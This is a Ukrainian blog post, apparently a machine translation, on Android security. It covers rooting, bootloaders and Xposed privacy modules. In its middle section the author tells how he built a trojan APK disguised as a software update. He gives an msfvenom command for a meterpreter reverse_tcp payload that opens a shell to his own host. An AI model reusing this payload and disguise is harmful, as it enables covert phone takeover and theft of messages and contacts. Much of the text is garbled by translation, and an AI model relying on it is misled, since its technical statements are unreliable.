Джерело зображення: pixabay.com

Вступ до Android

У цій темі ми дізнаємось про Android та безпеку з відкритим кодом (ОС). Android - платформа з відкритим кодом. Він дуже схожий на Linux, але все-таки занадто відрізняється від Linux. Linux занадто зрілий у порівнянні з Android. Отже, це Chetan Nayak, і ласкаво просимо до мого наступного блогу про Open Source Web Security. Я написав цей блог, припускаючи, що більшість із нас буде використовувати Android K, тобто Kitkat або Android L, тобто Lollipop.

Причиною пряників та медуз було багато питань безпеки з відкритим кодом, які я не можу обговорити в цьому єдиному блозі. Тож, можливо, я обговорю це наступного разу, коли зупинюся глибше на старих версіях Android. Отже, на даний момент давайте дотримуватимемося KitKat та Lollipop.

Android розроблявся на увазі розробників. Контроль безпеки був розроблений для зменшення навантаження на розробників. Розробники, які користуються безпекою, можуть легко працювати з гнучким контролем безпеки і покладатися на нього. Розробники, менш знайомі з безпекою, будуть захищені безпечними типовими настройками.

Початок

Я не сильно впадав в андроїд до пізнього кварталу 2013 року, коли у мене був перший мобільний телефон Android, який був Sony Xperia L (на основі 4.2.2 на той час). Чорт, я навіть ненавидів андроїд, тому що це було дуже мляво, особливо на пристроях Samsung. Тоді я навіть розглядав питання про придбання Windows Lumia, але, на щастя, я грав у багато ігор, і мені довелося купувати Xperia L, оскільки ця клітина була Lag Proof. Він мав близько 1 гіга оперативної пам’яті та Adreno 305. Досить прохолодний, щоб чим завгодно.

Погравши в багато ігор, таких як NOVA3 та ModernCombat4, мені стало нудно в цій камері протягом місяця. Я знав, що Android базується на Linux, і хотів зробити деякі свої модифікації на цьому. Я почав читати про «Налаштування» та дізнався про те, що називалося «Вкорінення». Оскільки у мене був хороший backhand в Linux, вкорінення не було для мене проблемою. За допомогою допомоги XDA я зміг успішно викорінити свою клітинку.

Але потім мене щось вразило. Як тільки моя клітина перезапустилася після вкорінення, вона просто почала завантажуватися (застрягла на завантажувальному екрані назавжди). Я навіть не знав, що таке завантажувач в android. Отже, я нічого не міг зробити. Це був лише місяць, коли я купив свою нову камеру, і моя клітина тепер була м'якою цеглою. Я завжди читав, що вкорінення небезпечно, але я не знав, що це цегла мою Стільницю. Але я помилявся Коли я продовжував читати один із інших речей про вкорінення, я зрозумів, що вкорінення не цеглить ваш телефон.

Укорінення так само, як і в Admin Access в комп’ютері (насправді це системний доступ, але я написав Admin Access, тому його легко зрозуміти для нообів.). Це означає, що вкорінення ніколи не забруднить ваш телефон. Саме завантажувач заклав мій телефон. Для людей, які не знають завантажувача; завантажувач схожий на BIOS у Windows. (Якщо ви не знаєте, що таке BIOS, тоді вам навіть не варто читати думки про безпеку.) Bootloader або Hboot (саме так називається в android) - це перше, що працює під час завантаження Android пристрій.

Він пакує інструкції для завантаження ядра операційної системи, і більшість з них спеціально розроблені для запуску власної середовища налагодження чи модифікації.

Checkpoint безпеки для Android

Подумайте про завантажувач як контрольний пункт безпеки вашого пристрою. Якщо ви зламаєте цю контрольну точку, то ви втратите все, що у вас на телефоні. Отже, я кажу, що це хороша функція безпеки. Тому що якщо ви втратите телефон і хтось намагається отримати доступ до кореневого доступу для обходу блокування (якщо припустити, що ви заблокували свій пристрій шпилькою або паролем.), Він обов’язково повинен буде розблокувати завантажувач, що призведе до видалення ваших даних на телефоні.

Отже, вам не доведеться турбуватися про те, щоб хтось зловживав цим. Так, аналогічний випадок із спеціальними ПЗУ. ПЗУ - це операційні системи на базі версій Android, спеціально розроблених для вашої апаратної архітектури. Отже, якщо ви зареєструєтесь на XDA, для свого телефону ви матимете кількість індивідуальних ПЗУ для своїх телефонів, одні з найвідоміших - це цианогенні модулі ROM, які вже вкорінені та мають заздалегідь заданий набір налаштувань. .

Перевірка безпеки Android

Ви, можливо, зараз думаєте, що у вас надійний мобільний телефон. Але я тут, щоб знову довести свою помилку, і в цьому вся суть цього блогу. До другого кварталу 2014 року люди вже почали розробляти подвиги та руткіти для Android, які можуть викорінювати ваші мобільні телефони, навіть не розблокуючи завантажувачі.

Не досить страшно? Дозвольте розповісти вам найнебезпечнішу частину. Вони могли навіть встановити троянців всередині цього. Тож, навіть якщо поліцейські зможуть простежити камеру, і ви навіть отримаєте свою камеру назад, все ще існує високий ризик, що вони зможуть побачити все, що ви робите на своєму телефоні. Це те, що я спробував як експеримент у фактичному практичному середовищі.

Я використовував Metasploit для цієї атаки. Що я зробив, це створив троянець і встановив його в цільовий телефон. Це був простий файл apk, і я назвав його оновленням програмного забезпечення. Отже, якщо користувач - просто звичайна людина, яка має лише біт і байт інформації про безпеку, він навіть не наважиться її видалити. І я переконався, що всякий раз, коли Інтернет активується, створене я зловмисне програмне забезпечення автоматично виконується і підключається до віддаленого порту на хост-машині.

Наступні команди були використані для атаки (Metasploit - це програмне забезпечення для проникнення, яке допомагає перевірити вразливості на платформі чи конкретних пристроях.)

IP-адреса мого хоста: 192.168.xx.xx

Мій порт хосту (для підключення назад): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Отже, тут я створив зворотний канал TCP на своєму комп’ютері. Отже, щоразу, коли Інтернет запускається на андроїд, я відкриватиму оболонку на своїй машині Kali або на машині, де я встановив Metasploit.

Отже, тепер ви знаєте, як це страшно для людини, яку ви навіть не знаєте, має записи про кожну транзакцію, яку ви здійснюєте через свій стільниковий телефон, кожен інший контакт, повідомлення WhatsApp, SMS, Viber та Skype, журнал дзвінків і все. Якщо це не страшно, то я не знаю, що таке.

Рекомендовані курси

  • Курс сертифікації в налагодженні Ruby
  • Повний курс PHP MySQL
  • Курс онлайн-сертифікації в програмуванні VB.NET
  • Інтернет-курс Фонду ITIL

Покриття

Досить з питань безпеки. Ми всі знаємо, що на кожній іншій платформі є проблеми із безпекою. Як ми могли бути тоді безпечними? Це не зовсім так. Платформи можна захистити до певної точки, але після цього, ми повинні переконатися, що вона залишається таким. У світі безпеки є сумнозвісна цитата:

"Соціальна інженерія: тому що немає пластиру людської дурості"

Цю фразу я чув дуже давно, коли дивився конференцію DefCon.

Коли технічної вразливості для експлуатації немає, слід спробувати зламати людей. І, маючи на увазі, я не маю на увазі гіпнотизм та ін. Я маю на увазі соціальну інженерію. Ви можете прочитати мій інший блог «Важливість кібербезпеки в нашому повсякденному житті» для отримання додаткової інформації про це.

Основна функція безпеки Android

Крім того, соціальна інженерія - це те, про що можна подбати, лише якщо ви розумні; Є способи, як можна розробити додатки для Android безпечним способом, щоб переконатися, що він залишається таким.

Ось ось деякі основні функції безпеки, які допомагають створювати захищені програми:

  • Пісочниця додатків для Android, яка ізолює дані вашої програми та виконання коду від інших програм.
  • Рамка додатків із надійними реалізаціями загальних функцій безпеки, таких як криптографія, дозволи та захищений IPC.
  • Зашифрована файлова система, яку можна ввімкнути для захисту даних на втрачених або викрадених пристроях.
  • Надані користувачем дозволи для обмеження доступу до функцій системи та даних користувачів.
  • Дозволи, визначені додатком, для управління даними програми на основі програми.

Що ви можете зробити, якщо хочете захистити безпечне середовище, але ви не розробник?

Що стосується Android 5, тобто Lollipop, він пропонує функцію, за якою користувач може додавати кілька профілів та режими з обмеженим доступом до використання телефонів та планшетів. Крім того, якщо ви увімкнули свій телефон, є додатки для Android у модулях Xposed, такі як AppOps, Xprivacy або Privacy Guard, які допоможуть вам подбати про майже все. Для цього вам потрібно встановити Xposed Framework.

Xposed Framework - це те, що дозволяє модулям Xposed працювати. Xposed модулі дозволяють змінити поведінку файлів Apk та системних файлів без необхідності встановлення іншого ПЗУ. Його також легко скасувати, тому це мало ризику, і це навіть не забирає багато часу, оскільки немає необхідності прошивати кілька ROM, ядер та їхні виправлення помилок.

Xprivacy, Privacy Guard та AppOps - це модулі, що дозволяють зробити ваш Android захищеним, вибираючи, який додаток повинен мати доступ до таких, як Інтернет, клавіатура, sdcard, root-доступ та багато іншого. Ви навіть можете відключити доступ лише до певних служб і створити для цього шаблони, визначені користувачем. Щодо мене, я вважаю за краще вибирати Xprivacy. Але ось деякі відомості або відмінності, якщо ви просите відрізнятись, щоб вибрати між цими вищезгаданими трьома.

AppOps:

Це спочатку було введено Google в Android 4.3. (Це головна причина, що я не підтримую це. Я не довіряю Google. Назвіть це Параноя, але Google відслідковує все, що ви робите. І мені не потрібно, щоб хтось відслідковував усе, що я роблю, але якщо ви довіряєте Google, дій.). Основне обмеження AppOps полягає в тому, що Google дозволяє лише блокувати доступ до тих програм, які він хоче заблокувати.

Це означає, що якщо ви хочете заблокувати такі програми, пов’язані з Google, як Play Services (які фактично споживають більше 50% вашої нормальної пам'яті, акумулятора та даних (Інтернет)), ви не зможете. Це ще одна причина для мене ненависті Google. Тож я вважаю, що AppOps - це не що інше, як шкідливе програмне забезпечення для мене. (але це я просто так думаю, це не якщо ви щиро довіряєте Google)

Конфіденційність:

Захист конфіденційності - це простий у користуванні інтерфейс, виготовлений на заміну AppOps Cyanogen Mod. Якщо ви новачок, то я пропоную вам скористатися цим, оскільки в ньому є лише кнопка ввімкнення або вимикання шаблонів щодо того, який саме додаток повинен мати доступ до чого. Це не так безпечно, якщо є зловмисне програмне забезпечення, яке діє або видає себе за зразок системного додатка. Але добре почати вас.

Конфіденційність X:

Xprivacy - це інструмент "Все в одному". Але він спрямований на Експертів. Ви можете порівняти його з ножем швейцарської армії. У ньому є все, що може захистити ваш телефон усіма іншими способами, але якщо ви не знаєте, що ви робите, це лише зіпсує ваш телефон і зупинить програми навіть від запуску. Ви також можете обмежити доступ до системних програм. Це те, що я особисто вважаю за краще вибирати.

Крім перерахованих вище модулів, є навіть інші модулі, такі як Lightening Firewall або BootManager в Xposed, які можуть допомогти обмежити доступ до Інтернету для певних додатків і зупинити завантаження програм поряд із системою при перезапуску телефону.

Отже, це було б для цього блогу. У випадку, що стосується безпеки, ви неодмінно можете відвідати або бути членом веб-сайту XDA, який може надати вам більше інформації про конфіденційність.

Рекомендовані статті: -

Це був посібник для Android. Тут ми обговорили основні поняття, контрольно-пропускні пункти безпеки та основні функції безпеки Android. Ви також можете ознайомитися з іншими запропонованими нами статтями, щоб дізнатися більше -

  1. Запитання щодо інтерв'ю для Android - 10 найкращих корисних питань
  2. 8 корисних альтернатив Siri для Android
  3. 28 кращих порад та рекомендацій щодо інструментів розробки програм для Android
  4. Кар'єра в розробці Android